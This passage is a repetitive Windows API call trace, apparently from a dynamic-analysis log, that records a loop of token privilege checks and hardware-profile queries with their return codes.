pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.057] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.057] GetCurrentThread () returned 0xfffffffe [0085.057] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.057] GetLastError () returned 0x3f0 [0085.057] GetCurrentProcess () returned 0xffffffff [0085.057] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.057] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.057] SetLastError (dwErrCode=0x522) [0085.057] CloseHandle (hObject=0x114) returned 1 [0085.057] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.057] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.057] GetLastError () returned 0x578 [0085.057] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.057] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.057] GetCurrentThread () returned 0xfffffffe [0085.057] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.058] GetLastError () returned 0x3f0 [0085.058] GetCurrentProcess () returned 0xffffffff [0085.058] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.058] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.058] SetLastError (dwErrCode=0x522) [0085.058] CloseHandle (hObject=0x114) returned 1 [0085.058] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.058] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.058] GetLastError () returned 0x578 [0085.058] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.058] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.058] GetCurrentThread () returned 0xfffffffe [0085.058] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.058] GetLastError () returned 0x3f0 [0085.058] GetCurrentProcess () returned 0xffffffff [0085.058] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.058] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.058] SetLastError (dwErrCode=0x522) [0085.058] CloseHandle (hObject=0x114) returned 1 [0085.058] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.058] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.058] GetLastError () returned 0x578 [0085.058] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.058] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.058] GetCurrentThread () returned 0xfffffffe [0085.058] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.058] GetLastError () returned 0x3f0 [0085.058] GetCurrentProcess () returned 0xffffffff [0085.058] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.058] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.058] SetLastError (dwErrCode=0x522) [0085.058] CloseHandle (hObject=0x114) returned 1 [0085.058] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.058] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.058] GetLastError () returned 0x578 [0085.058] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.058] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.058] GetCurrentThread () returned 0xfffffffe [0085.058] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.058] GetLastError () returned 0x3f0 [0085.058] GetCurrentProcess () returned 0xffffffff [0085.058] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.058] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.058] SetLastError (dwErrCode=0x522) [0085.058] CloseHandle (hObject=0x114) returned 1 [0085.058] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.058] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.058] GetLastError () returned 0x578 [0085.059] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.059] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.059] GetCurrentThread () returned 0xfffffffe [0085.059] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.059] GetLastError () returned 0x3f0 [0085.059] GetCurrentProcess () returned 0xffffffff [0085.059] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.059] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.059] SetLastError (dwErrCode=0x522) [0085.059] CloseHandle (hObject=0x114) returned 1 [0085.059] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.059] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.059] GetLastError () returned 0x578 [0085.059] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.059] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.059] GetCurrentThread () returned 0xfffffffe [0085.059] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.059] GetLastError () returned 0x3f0 [0085.059] GetCurrentProcess () returned 0xffffffff [0085.059] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.059] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.059] SetLastError (dwErrCode=0x522) [0085.059] CloseHandle (hObject=0x114) returned 1 [0085.059] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.059] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.059] GetLastError () returned 0x578 [0085.059] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.059] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.059] GetCurrentThread () returned 0xfffffffe [0085.059] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.059] GetLastError () returned 0x3f0 [0085.059] GetCurrentProcess () returned 0xffffffff [0085.059] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.059] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.059] SetLastError (dwErrCode=0x522) [0085.059] CloseHandle (hObject=0x114) returned 1 [0085.059] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.059] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.059] GetLastError () returned 0x578 [0085.059] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.059] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.059] GetCurrentThread () returned 0xfffffffe [0085.059] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.059] GetLastError () returned 0x3f0 [0085.059] GetCurrentProcess () returned 0xffffffff [0085.059] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.059] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.059] SetLastError (dwErrCode=0x522) [0085.059] CloseHandle (hObject=0x114) returned 1 [0085.060] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.060] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.060] GetLastError () returned 0x578 [0085.060] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.060] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.060] GetCurrentThread () returned 0xfffffffe [0085.060] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.060] GetLastError () returned 0x3f0 [0085.060] GetCurrentProcess () returned 0xffffffff [0085.060] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.060] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.060] SetLastError (dwErrCode=0x522) [0085.060] CloseHandle (hObject=0x114) returned 1 [0085.060] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.060] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.060] GetLastError () returned 0x578 [0085.060] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.060] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.060] GetCurrentThread () returned 0xfffffffe [0085.060] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.060] GetLastError () returned 0x3f0 [0085.060] GetCurrentProcess () returned 0xffffffff [0085.060] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.060] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.060] SetLastError (dwErrCode=0x522) [0085.060] CloseHandle (hObject=0x114) returned 1 [0085.060] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.060] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.060] GetLastError () returned 0x578 [0085.060] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.060] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.060] GetCurrentThread () returned 0xfffffffe [0085.060] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.060] GetLastError () returned 0x3f0 [0085.060] GetCurrentProcess () returned 0xffffffff [0085.060] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.060] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.060] SetLastError (dwErrCode=0x522) [0085.060] CloseHandle (hObject=0x114) returned 1 [0085.060] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.060] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.060] GetLastError () returned 0x578 [0085.060] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.060] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.060] GetCurrentThread () returned 0xfffffffe [0085.060] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.060] GetLastError () returned 0x3f0 [0085.060] GetCurrentProcess () returned 0xffffffff [0085.060] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.061] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.061] SetLastError (dwErrCode=0x522) [0085.061] CloseHandle (hObject=0x114) returned 1 [0085.061] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.061] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.061] GetLastError () returned 0x578 [0085.061] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.061] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.061] GetCurrentThread () returned 0xfffffffe [0085.061] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.061] GetLastError () returned 0x3f0 [0085.061] GetCurrentProcess () returned 0xffffffff [0085.061] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.061] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.061] SetLastError (dwErrCode=0x522) [0085.061] CloseHandle (hObject=0x114) returned 1 [0085.061] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.061] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.061] GetLastError () returned 0x578 [0085.061] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.061] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.061] GetCurrentThread () returned 0xfffffffe [0085.061] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.061] GetLastError () returned 0x3f0 [0085.061] GetCurrentProcess () returned 0xffffffff [0085.061] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.061] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.061] SetLastError (dwErrCode=0x522) [0085.061] CloseHandle (hObject=0x114) returned 1 [0085.061] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.061] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.061] GetLastError () returned 0x578 [0085.061] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.061] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.061] GetCurrentThread () returned 0xfffffffe [0085.061] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.061] GetLastError () returned 0x3f0 [0085.061] GetCurrentProcess () returned 0xffffffff [0085.061] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.061] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.061] SetLastError (dwErrCode=0x522) [0085.061] CloseHandle (hObject=0x114) returned 1 [0085.061] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.061] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.061] GetLastError () returned 0x578 [0085.061] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.061] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.061] GetCurrentThread () returned 0xfffffffe [0085.061] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.062] GetLastError () returned 0x3f0 [0085.062] GetCurrentProcess () returned 0xffffffff [0085.062] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.062] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.062] SetLastError (dwErrCode=0x522) [0085.062] CloseHandle (hObject=0x114) returned 1 [0085.062] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.062] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.062] GetLastError () returned 0x578 [0085.062] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.062] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.062] GetCurrentThread () returned 0xfffffffe [0085.062] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.062] GetLastError () returned 0x3f0 [0085.062] GetCurrentProcess () returned 0xffffffff [0085.062] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.062] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.062] SetLastError (dwErrCode=0x522) [0085.062] CloseHandle (hObject=0x114) returned 1 [0085.062] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.062] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.062] GetLastError () returned 0x578 [0085.062] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.062] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.062] GetCurrentThread () returned 0xfffffffe [0085.062] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.062] GetLastError () returned 0x3f0 [0085.062] GetCurrentProcess () returned 0xffffffff [0085.062] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.062] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.062] SetLastError (dwErrCode=0x522) [0085.062] CloseHandle (hObject=0x114) returned 1 [0085.062] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.062] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.062] GetLastError () returned 0x578 [0085.062] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.062] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.062] GetCurrentThread () returned 0xfffffffe [0085.062] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.062] GetLastError () returned 0x3f0 [0085.062] GetCurrentProcess () returned 0xffffffff [0085.062] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.062] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.062] SetLastError (dwErrCode=0x522) [0085.062] CloseHandle (hObject=0x114) returned 1 [0085.062] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.062] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.062] GetLastError () returned 0x578 [0085.062] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.063] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.063] GetCurrentThread () returned 0xfffffffe [0085.063] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.063] GetLastError () returned 0x3f0 [0085.063] GetCurrentProcess () returned 0xffffffff [0085.063] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.063] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.063] SetLastError (dwErrCode=0x522) [0085.063] CloseHandle (hObject=0x114) returned 1 [0085.063] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.063] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.063] GetLastError () returned 0x578 [0085.063] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.063] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.063] GetCurrentThread () returned 0xfffffffe [0085.063] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.063] GetLastError () returned 0x3f0 [0085.063] GetCurrentProcess () returned 0xffffffff [0085.063] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.063] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.063] SetLastError (dwErrCode=0x522) [0085.063] CloseHandle (hObject=0x114) returned 1 [0085.063] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.063] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.063] GetLastError () returned 0x578 [0085.063] 